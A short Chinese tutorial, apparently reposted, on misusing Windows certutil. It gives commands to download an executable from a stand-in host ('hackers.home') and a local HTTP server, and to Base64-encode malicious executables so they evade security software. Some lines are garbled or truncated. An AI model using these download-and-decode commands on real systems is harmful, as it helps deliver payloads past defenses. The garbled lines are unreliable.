certutil工具的使用介绍

一、Certutil 介绍

Windows有一个名为CertUtil的内置程序，可用于在Windows中管理证书。使用此程序可以在Windows中安装，备份，删除，管理和执行与证书和证书存储相关的各种功能。
CertUtil的一个特性是能够从远程URL下载证书或任何其他文件，因为certutil是windows自带的exe。
使用语法 :
"certutil.exe -urlcache -split -f https://hackers.home/content.txt ... exe office365.exe

1. C:\Users\12345\Desktop>123.exe -python -m http.server 8000
2. C:\Users\12345\Desktop>python -m http.server 8000
3. certutil -urlcache -split -f http://192.168.206.130:8000/123.exe

复制代码

2.3 使用CertUtil + Base64来绕过安全软件

Certutil 包含一个编码参数（编码），这有助于在 Base64 中编码文件的内容。可以使用 certutil 对可执行文件举行编码，然后传输编码后的数据，在接收机上对其举行解码。
常用与sql注入，对恣意文件举行Base64编码，使恶意代码样本看起来像是无害的文本文件，然后使用CertUtil.exe下载后对其举行解码。下载了文本文件使用“Certutil.exe -decode”下令将Base64编码文件解码为可执行文件。

1. 将123.exe编码为123.txt
2. C:\Users\12345\Desktop>certutil.exe -encode 123.exe 123.txt
4. 将123.txt解码为123.exe
5. C:\Users\12345\Desktop>certutil.exe -decode 123.txt 123.exe

复制代码

更多详解参考--->
https://mrwq.github.io/aggregate-paper/butian/certutil详解/

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

继续阅读请点击广告